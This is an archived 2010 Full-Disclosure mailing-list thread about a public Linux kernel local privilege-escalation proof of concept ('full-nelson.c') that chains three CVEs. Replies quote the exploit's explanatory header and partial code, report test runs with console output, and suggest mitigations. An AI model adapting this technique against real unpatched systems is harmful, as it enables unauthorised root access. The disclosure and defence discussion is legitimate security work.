subject:"Re\: \[Full\-disclosure\] Linux kernel exploit"

Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread Cal Leeming [Simplicity Media Ltd]

Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>
> --snip--
>
> /*
>   * Linux Kernel<= 2.6.37 local privilege escalation
>   * by Dan Rosenberg
>   * @djrbliss on twitter
>   *
>   * Usage:
>   * gcc full-nelson.c -o full-nelson
>   * ./full-nelson
>   *
>   * This exploit leverages three vulnerabilities to get root, all of which 
> were
>   * discovered by Nelson Elhage:
>   *
>   * CVE-2010-4258
>   * -
>   * This is the interesting one, and the reason I wrote this exploit.  If a
>   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
>   * word will be written to a user-specified pointer when that thread exits.
>   * This write is done using put_user(), which ensures the provided 
> destination
>   * resides in valid userspace by invoking access_ok().  However, Nelson
>   * discovered that when the kernel performs an address limit override via
>   * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
>   * etc.), this override is not reverted before calling put_user() in the exit
>   * path, allowing a user to write a NULL word to an arbitrary kernel address.
>   * Note that this issue requires an additional vulnerability to trigger.
>   *
>   * CVE-2010-3849
>   * -
>   * This is a NULL pointer dereference in the Econet protocol.  By itself, 
> it's
>   * fairly benign as a local denial-of-service.  It's a perfect candidate to
>   * trigger the above issue, since it's reachable via sock_no_sendpage(), 
> which
>   * subsequently calls sendmsg under KERNEL_DS.
>   *
>   * CVE-2010-3850
>   * -
>   * I wouldn't be able to reach the NULL pointer dereference and trigger the
>   * OOPS if users weren't able to assign Econet addresses to arbitrary
>   * interfaces due to a missing capabilities check.
>   *
>   * In the interest of public safety, this exploit was specifically designed 
> to
>   * be limited:
>   *
>   *  * The particular symbols I resolve are not exported on Slackware or 
> Debian
>   *  * Red Hat does not support Econet by default
>   *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>   *Debian
>   *
>   * However, the important issue, CVE-2010-4258, affects everyone, and it 
> would
>   * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>   * more sophisticated version of this that doesn't have the roadblocks I put 
> in
>   * to prevent abuse by script kiddies.
>   *
>   * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>   *
>   * NOTE: the exploit process will deadlock and stay in a zombie state after 
> you
>   * exit your root shell because the Econet thread OOPSes while holding the
>   * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't 
> bother.
>   *
>   * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>   */
>
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
>
> /* How many bytes should we clear in our
>   * function pointer to put it into userspace? */
> #ifdef __x86_64__
> #define SHIFT 24
> #define OFFSET 3
> #else
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
>   FILE *f;
>   unsigned long addr;
>   char dummy;
>   char sname[512];
>   struct utsname ver;
>   int ret;
>   int rep = 0;
>   int oldstyle = 0;
>
>   f = fopen("/proc/kallsyms", "r");
>   if (f == NULL) {
>   f = fopen("/proc/ksyms", "r");
>   if (f == NULL)
>   goto fallback;
>   oldstyle = 1;
>   }
>
> repeat:
>   ret = 0;
>   while(ret != EOF) {
>   if (!oldstyle)
>   ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, 
> sname);
>   else {
>   ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
>   if (ret == 2) {
>   char *p;
>   if (strstr(sname, "_O/") || strstr(sname, 
> "_S."))
>   continue;
>   p = strrchr(sname, '_');
>   if (p>  ((char *)sname + 5)&&  !strncmp(p - 3, 
> "smp", 3)) {
>   p = p - 4;
>   while (p>  (char *)sname&&  *(p - 1) == 
> '_')
>   p--;
>   *p = '\0';
>   }
>   }
>   }
>   if (ret == 0) {
>   fscanf(f, "%s\

Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread Ryan Sears

Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 
2.6.35-22-generic). Works as expected. 

Great job Dan. You're full of win!

Regards,
Ryan Sears
- Original Message -
From: "Cal Leeming [Simplicity Media Ltd]" 

To: "Dan Rosenberg" 
Cc: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
Sent: Tuesday, December 7, 2010 4:06:44 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Linux kernel exploit

Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>
> --snip--
>
> /*
>   * Linux Kernel<= 2.6.37 local privilege escalation
>   * by Dan Rosenberg
>   * @djrbliss on twitter
>   *
>   * Usage:
>   * gcc full-nelson.c -o full-nelson
>   * ./full-nelson
>   *
>   * This exploit leverages three vulnerabilities to get root, all of which 
> were
>   * discovered by Nelson Elhage:
>   *
>   * CVE-2010-4258
>   * -
>   * This is the interesting one, and the reason I wrote this exploit.  If a
>   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
>   * word will be written to a user-specified pointer when that thread exits.
>   * This write is done using put_user(), which ensures the provided 
> destination
>   * resides in valid userspace by invoking access_ok().  However, Nelson
>   * discovered that when the kernel performs an address limit override via
>   * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
>   * etc.), this override is not reverted before calling put_user() in the exit
>   * path, allowing a user to write a NULL word to an arbitrary kernel address.
>   * Note that this issue requires an additional vulnerability to trigger.
>   *
>   * CVE-2010-3849
>   * -
>   * This is a NULL pointer dereference in the Econet protocol.  By itself, 
> it's
>   * fairly benign as a local denial-of-service.  It's a perfect candidate to
>   * trigger the above issue, since it's reachable via sock_no_sendpage(), 
> which
>   * subsequently calls sendmsg under KERNEL_DS.
>   *
>   * CVE-2010-3850
>   * -
>   * I wouldn't be able to reach the NULL pointer dereference and trigger the
>   * OOPS if users weren't able to assign Econet addresses to arbitrary
>   * interfaces due to a missing capabilities check.
>   *
>   * In the interest of public safety, this exploit was specifically designed 
> to
>   * be limited:
>   *
>   *  * The particular symbols I resolve are not exported on Slackware or 
> Debian
>   *  * Red Hat does not support Econet by default
>   *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>   *Debian
>   *
>   * However, the important issue, CVE-2010-4258, affects everyone, and it 
> would
>   * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>   * more sophisticated version of this that doesn't have the roadblocks I put 
> in
>   * to prevent abuse by script kiddies.
>   *
>   * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>   *
>   * NOTE: the exploit process will deadlock and stay in a zombie state after 
> you
>   * exit your root shell because the Econet thread OOPSes while holding the
>   * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't 
> bother.
>   *
>   * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>   */
>
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
>
> /* How many bytes should we clear in our
>   * function pointer to put it into userspace? */
> #ifdef __x86_64__
> #define SHIFT 24
> #define OFFSET 3
> #else
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
>   FILE *f;
>   unsigned long addr;
>   char dummy;
>   char sname[512];
>   struct utsname ver;
>   int ret;
>   int rep = 0;
>   int oldstyle = 0;
>
>   f = fopen("/proc/kallsyms", "r");
>   if (f == NULL) {
>   f = fopen("/proc/ksyms", "r");
>   if (f == NULL)
>   goto fallback;
>   oldstyle = 1;
>   }
>
> repeat:
>   ret = 0;
>

Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread coderman

On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
 wrote:
> ... I've included here a proof-of-concept local privilege escalation 
> exploit...
>  * This exploit leverages three vulnerabilities to get root, all of which were
>  * discovered by Nelson Elhage:
>...
>  * However, the important issue, CVE-2010-4258, affects everyone, and it would
>  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>  * more sophisticated version of this...

nice :)

clearly demonstrates why risk is complicated and seemingly minor
defects (worth delaying patches for weeks/months? ;) can combine into
truly ugly vulnerabilities...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread Rem7ter

Why gcc exp.c -o exp alert "Error: too many Argument"?  I test it in Linux
2.6.X.

2010/12/7 coderman 

> On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
>  wrote:
> > ... I've included here a proof-of-concept local privilege escalation
> exploit...
> >  * This exploit leverages three vulnerabilities to get root, all of which
> were
> >  * discovered by Nelson Elhage:
> >...
> >  * However, the important issue, CVE-2010-4258, affects everyone, and it
> would
> >  * be trivial to find an unpatched DoS under KERNEL_DS and write a
> slightly
> >  * more sophisticated version of this...
>
> nice :)
>
> clearly demonstrates why risk is complicated and seemingly minor
> defects (worth delaying patches for weeks/months? ;) can combine into
> truly ugly vulnerabilities...
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread mezgani ali

it's worked on 2.6.35.7, nice exploit

On Wed, Dec 8, 2010 at 6:09 AM, Rem7ter  wrote:

> Why gcc exp.c -o exp alert "Error: too many Argument"?  I test it in Linux
> 2.6.X.
>
> 2010/12/7 coderman 
>
> On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
>>  wrote:
>> > ... I've included here a proof-of-concept local privilege escalation
>> exploit...
>> >  * This exploit leverages three vulnerabilities to get root, all of
>> which were
>> >  * discovered by Nelson Elhage:
>> >...
>> >  * However, the important issue, CVE-2010-4258, affects everyone, and it
>> would
>> >  * be trivial to find an unpatched DoS under KERNEL_DS and write a
>> slightly
>> >  * more sophisticated version of this...
>>
>> nice :)
>>
>> clearly demonstrates why risk is complicated and seemingly minor
>> defects (worth delaying patches for weeks/months? ;) can combine into
>> truly ugly vulnerabilities...
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
Ali MEZGANI
Network Engineering/Security
http://securfox.wordpress.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Guillaume Friloux

Doesnt work here on Ubuntu 10.10 (VirtualBox) clean install (but with 
all updates) with only an “apt-get install build-essential”


k...@kuri-virtualbox:~$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.10
DISTRIB_CODENAME=maverick
DISTRIB_DESCRIPTION="Ubuntu 10.10"
k...@kuri-virtualbox:~$ uname -a
Linux kuri-VirtualBox 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 
10:18:49 UTC 2010 i686 GNU/Linux

k...@kuri-virtualbox:~$ gcc -o exploit exploit.c
k...@kuri-virtualbox:~$ ./exploit
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf81ca340
[+] Resolved econet_ops to 0xf81ca440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved prepare_kernel_cred to 0xc016cd20
[*] Calculating target...
[*] Triggering payload...
[*] Exploit failed to get root.
k...@kuri-virtualbox:~$

On 07/12/2010 22:21, Ryan Sears wrote:

Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 
2.6.35-22-generic). Works as expected.

Great job Dan. You're full of win!

Regards,
Ryan Sears
- Original Message -
From: "Cal Leeming [Simplicity Media Ltd]"
To: "Dan Rosenberg"
Cc: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
Sent: Tuesday, December 7, 2010 4:06:44 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Linux kernel exploit

Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:

Hi all,

I've included here a proof-of-concept local privilege escalation exploit
for Linux.  Please read the header for an explanation of what's going
on.  Without further ado, I present full-nelson.c:

Happy hacking,
Dan


--snip--

/*
   * Linux Kernel<= 2.6.37 local privilege escalation
   * by Dan Rosenberg
   * @djrbliss on twitter
   *
   * Usage:
   * gcc full-nelson.c -o full-nelson
   * ./full-nelson
   *
   * This exploit leverages three vulnerabilities to get root, all of which were
   * discovered by Nelson Elhage:
   *
   * CVE-2010-4258
   * -
   * This is the interesting one, and the reason I wrote this exploit.  If a
   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
   * word will be written to a user-specified pointer when that thread exits.
   * This write is done using put_user(), which ensures the provided destination
   * resides in valid userspace by invoking access_ok().  However, Nelson
   * discovered that when the kernel performs an address limit override via
   * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
   * etc.), this override is not reverted before calling put_user() in the exit
   * path, allowing a user to write a NULL word to an arbitrary kernel address.
   * Note that this issue requires an additional vulnerability to trigger.
   *
   * CVE-2010-3849
   * -
   * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
   * fairly benign as a local denial-of-service.  It's a perfect candidate to
   * trigger the above issue, since it's reachable via sock_no_sendpage(), which
   * subsequently calls sendmsg under KERNEL_DS.
   *
   * CVE-2010-3850
   * -
   * I wouldn't be able to reach the NULL pointer dereference and trigger the
   * OOPS if users weren't able to assign Econet addresses to arbitrary
   * interfaces due to a missing capabilities check.
   *
   * In the interest of public safety, this exploit was specifically designed to
   * be limited:
   *
   *  * The particular symbols I resolve are not exported on Slackware or Debian
   *  * Red Hat does not support Econet by default
   *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
   *Debian
   *
   * However, the important issue, CVE-2010-4258, affects everyone, and it would
   * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
   * more sophisticated version of this that doesn't have the roadblocks I put 
in
   * to prevent abuse by script kiddies.
   *
   * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
   *
   * NOTE: the exploit process will deadlock and stay in a zombie state after 
you
   * exit your root shell because the Econet thread OOPSes while holding the
   * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
   *
   * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
   */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* How many bytes should we clear in our
   * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;

f = fopen(&quo

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Kai


 > Anyone tested this in sandbox yet?

00:37 linups:../expl/kernel > cat /etc/*release*
openSUSE 11.3 (i586)
VERSION = 11.3
00:37 linups:../expl/kernel > uname -r
2.6.34.4-0.1-desktop
00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
00:37 linups:../expl/kernel > ./test
[*] Failed to open file descriptors.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Thomas SOETE

Failed on Ubuntu 10.10 (2.6.35-23-generic)

t...@bifrost:/tmp$ uname -a
Linux bifrost 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC
2010 x86_64 GNU/Linux

t...@bifrost:/tmp$ ./a.out
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xa03d9610
 [+] Resolved econet_ops to 0xa03d9720
 [+] Resolved commit_creds to 0x810863c0
 [+] Resolved prepare_kernel_cred to 0x81086890
[*] Calculating target...
[*] Triggering payload...
[*] Exploit failed to get root.



2010/12/7 coderman :
> On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
>  wrote:
>> ... I've included here a proof-of-concept local privilege escalation 
>> exploit...
>>  * This exploit leverages three vulnerabilities to get root, all of which 
>> were
>>  * discovered by Nelson Elhage:
>>...
>>  * However, the important issue, CVE-2010-4258, affects everyone, and it 
>> would
>>  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>>  * more sophisticated version of this...
>
> nice :)
>
> clearly demonstrates why risk is complicated and seemingly minor
> defects (worth delaying patches for weeks/months? ;) can combine into
> truly ugly vulnerabilities...
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Dan Rosenberg

If you've applied all your Ubuntu updates, the exploit is not going to
work.  I decided to take a more responsible approach to exploit
publishing with this release.  Rather than publish a fully weaponized
exploit that could be used by script kiddies everywhere to compromise
innocent users' machines, I published a limited version that proves
the exploitability of the issue without putting too many people at
unnecessary risk.  As I said, the exploit could be easily adapted to
work on any current distribution, since fixes for CVE-2010-4258 are
not available yet.

Please read the exploit text before you run it next time.  ;)

Quote:

* In the interest of public safety, this exploit was specifically designed to
* be limited:
*
*  * The particular symbols I resolve are not exported on Slackware or Debian
*  * Red Hat does not support Econet by default
*  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
*    Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn't have the roadblocks I put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*

-Dan

On Tue, Dec 7, 2010 at 4:40 PM, Thomas SOETE  wrote:
> Failed on Ubuntu 10.10 (2.6.35-23-generic)
>
> t...@bifrost:/tmp$ uname -a
> Linux bifrost 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC
> 2010 x86_64 GNU/Linux
>
> t...@bifrost:/tmp$ ./a.out
> [*] Resolving kernel addresses...
>  [+] Resolved econet_ioctl to 0xa03d9610
>  [+] Resolved econet_ops to 0xa03d9720
>  [+] Resolved commit_creds to 0x810863c0
>  [+] Resolved prepare_kernel_cred to 0x81086890
> [*] Calculating target...
> [*] Triggering payload...
> [*] Exploit failed to get root.
>
>
>
> 2010/12/7 coderman :
>> On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
>>  wrote:
>>> ... I've included here a proof-of-concept local privilege escalation 
>>> exploit...
>>>  * This exploit leverages three vulnerabilities to get root, all of which 
>>> were
>>>  * discovered by Nelson Elhage:
>>>...
>>>  * However, the important issue, CVE-2010-4258, affects everyone, and it 
>>> would
>>>  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>>>  * more sophisticated version of this...
>>
>> nice :)
>>
>> clearly demonstrates why risk is complicated and seemingly minor
>> defects (worth delaying patches for weeks/months? ;) can combine into
>> truly ugly vulnerabilities...
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread nix

> Failed on Ubuntu 10.10 (2.6.35-23-generic)
>
> t...@bifrost:/tmp$ uname -a
> Linux bifrost 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC
> 2010 x86_64 GNU/Linux
>
> t...@bifrost:/tmp$ ./a.out
> [*] Resolving kernel addresses...
>  [+] Resolved econet_ioctl to 0xa03d9610
>  [+] Resolved econet_ops to 0xa03d9720
>  [+] Resolved commit_creds to 0x810863c0
>  [+] Resolved prepare_kernel_cred to 0x81086890
> [*] Calculating target...
> [*] Triggering payload...
> [*] Exploit failed to get root.
>
>
>
> 2010/12/7 coderman :
>> On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
>>  wrote:
>>> ... I've included here a proof-of-concept local privilege escalation
>>> exploit...
>>>  * This exploit leverages three vulnerabilities to get root, all of
>>> which were
>>>  * discovered by Nelson Elhage:
>>>...
>>>  * However, the important issue, CVE-2010-4258, affects everyone, and
>>> it would
>>>  * be trivial to find an unpatched DoS under KERNEL_DS and write a
>>> slightly
>>>  * more sophisticated version of this...
>>
>> nice :)
>>
>> clearly demonstrates why risk is complicated and seemingly minor
>> defects (worth delaying patches for weeks/months? ;) can combine into
>> truly ugly vulnerabilities...
>>

Failed also as expected on my custom 2.6.32.25-grsec #3 SMP x86_64 GNU/Linux
. Nice found anyway while we are waiting for other versions :)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Marcus Meissner

On Wed, Dec 08, 2010 at 12:44:09AM +0300, Kai wrote:
> 
>  > Anyone tested this in sandbox yet?
> 
> 00:37 linups:../expl/kernel > cat /etc/*release*
> openSUSE 11.3 (i586)
> VERSION = 11.3
> 00:37 linups:../expl/kernel > uname -r
> 2.6.34.4-0.1-desktop
> 00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
> 00:37 linups:../expl/kernel > ./test
> [*] Failed to open file descriptors.

openSUSE 11.2 and 11.3 do not have ECONET compiled,
openSUSE 11.1 has ECONET, but not the 0 ptr deref issue.

The CVE-2010-4258 problem is however in all openSUSEs.

Temporary workaround (for all distributions, not just openSUSE):
echo 1 > /proc/sys/kernel/panic_on_oops
This will now panic the machine instead of making it exploitable.

Ciao, Marcus

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Sherwyn

It works for me with the default install on Ubuntu 10.10 kernel 
2.6.35-22-generic once you run the updates it changes to 2.6.35-23 and then it 
fails.
Infolookup
http://infolookup.securegossip.com
www.twitter.com/infolookup


-Original Message-
From: Guillaume Friloux 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Wed, 08 Dec 2010 09:12:36 
To: 
Subject: Re: [Full-disclosure] Linux kernel exploit

Doesnt work here on Ubuntu 10.10 (VirtualBox) clean install (but with 
all updates) with only an “apt-get install build-essential”

k...@kuri-virtualbox:~$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.10
DISTRIB_CODENAME=maverick
DISTRIB_DESCRIPTION="Ubuntu 10.10"
k...@kuri-virtualbox:~$ uname -a
Linux kuri-VirtualBox 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 
10:18:49 UTC 2010 i686 GNU/Linux
k...@kuri-virtualbox:~$ gcc -o exploit exploit.c
k...@kuri-virtualbox:~$ ./exploit
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf81ca340
[+] Resolved econet_ops to 0xf81ca440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved prepare_kernel_cred to 0xc016cd20
[*] Calculating target...
[*] Triggering payload...
[*] Exploit failed to get root.
k...@kuri-virtualbox:~$

On 07/12/2010 22:21, Ryan Sears wrote:
> Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 
> 2.6.35-22-generic). Works as expected.
>
> Great job Dan. You're full of win!
>
> Regards,
> Ryan Sears
> - Original Message -
> From: "Cal Leeming [Simplicity Media 
> Ltd]"
> To: "Dan Rosenberg"
> Cc: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
> Sent: Tuesday, December 7, 2010 4:06:44 PM GMT -05:00 US/Canada Eastern
> Subject: Re: [Full-disclosure] Linux kernel exploit
>
> Anyone tested this in sandbox yet?
>
> On 07/12/2010 20:25, Dan Rosenberg wrote:
>> Hi all,
>>
>> I've included here a proof-of-concept local privilege escalation exploit
>> for Linux.  Please read the header for an explanation of what's going
>> on.  Without further ado, I present full-nelson.c:
>>
>> Happy hacking,
>> Dan
>>
>>
>> --snip--
>>
>> /*
>>* Linux Kernel<= 2.6.37 local privilege escalation
>>* by Dan Rosenberg
>>* @djrbliss on twitter
>>*
>>* Usage:
>>* gcc full-nelson.c -o full-nelson
>>* ./full-nelson
>>*
>>* This exploit leverages three vulnerabilities to get root, all of which 
>> were
>>* discovered by Nelson Elhage:
>>*
>>* CVE-2010-4258
>>* -
>>* This is the interesting one, and the reason I wrote this exploit.  If a
>>* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a 
>> NULL
>>* word will be written to a user-specified pointer when that thread exits.
>>* This write is done using put_user(), which ensures the provided 
>> destination
>>* resides in valid userspace by invoking access_ok().  However, Nelson
>>* discovered that when the kernel performs an address limit override via
>>* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page 
>> fault,
>>* etc.), this override is not reverted before calling put_user() in the 
>> exit
>>* path, allowing a user to write a NULL word to an arbitrary kernel 
>> address.
>>* Note that this issue requires an additional vulnerability to trigger.
>>*
>>* CVE-2010-3849
>>* -
>>* This is a NULL pointer dereference in the Econet protocol.  By itself, 
>> it's
>>* fairly benign as a local denial-of-service.  It's a perfect candidate to
>>* trigger the above issue, since it's reachable via sock_no_sendpage(), 
>> which
>>* subsequently calls sendmsg under KERNEL_DS.
>>*
>>* CVE-2010-3850
>>* -
>>* I wouldn't be able to reach the NULL pointer dereference and trigger the
>>* OOPS if users weren't able to assign Econet addresses to arbitrary
>>* interfaces due to a missing capabilities check.
>>*
>>* In the interest of public safety, this exploit was specifically 
>> designed to
>>* be limited:
>>*
>>*  * The particular symbols I resolve are not exported on Slackware or 
>> Debian
>>*  * Red Hat does not support Econet by default
>>*  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>>*Debian
>>*
>>* However, the important issue, CVE-2010-4258, affects everyone, and it 
>> would
>>* be trivial to find an unpatched DoS un

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread dave b

I ran it and my computer turned into a mudkip. I took a picture which
I have uploaded at [0]
I didn't read the instructions was I supposed to?


[0] - 
http://www.aspectofthehare.net/wp-content/uploads/2009/07/MudkipComputerGame.png

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread John Jacobs


> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:

Hello Dan, is this exploitation not mitigated by best practice 
defense-in-depth strategies such as preventing the CAP_SYS_MODULE 
capability or '/sbin/sysctl -w kernel.modules_disabled=1' respectively? 
 It seems it'd certainly stop the Econet/Acorn issue.

Curious to hear your input as I fear too many rely solely on errata updates and 
not a good defense-in-depth approach.

> Happy hacking,
> Dan

Cheers,
John Jacobs
  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread niklas | brueckenschlaeger

Debian lenny:

  nik...@sandbox:~$ uname -a
  Linux sandbox 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010
x86_64 GNU/Linux
  nik...@sandbox:~$ make full-nelson
  cc full-nelson.c   -o full-nelson
  nik...@sandbox:~$ ./full-nelson
  [*] Resolving kernel addresses...
   [+] Resolved econet_ioctl to 0xa01d319b
   [+] Resolved econet_ops to 0xa01d41e0
  [*] Failed to resolve kernel symbols.


On Wed, 2010-12-08 at 00:44 +0300, Kai wrote:
> > Anyone tested this in sandbox yet?
> 
> 00:37 linups:../expl/kernel > cat /etc/*release*
> openSUSE 11.3 (i586)
> VERSION = 11.3
> 00:37 linups:../expl/kernel > uname -r
> 2.6.34.4-0.1-desktop
> 00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
> 00:37 linups:../expl/kernel > ./test
> [*] Failed to open file descriptors.
> 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread leandro_lista

Works in kernel 2.6.32-24



Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19
01:38:40 UTC 2010 x86_64 GNU/Linux

ind...@indzin-desktop:~$ ./nels 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xa0239510
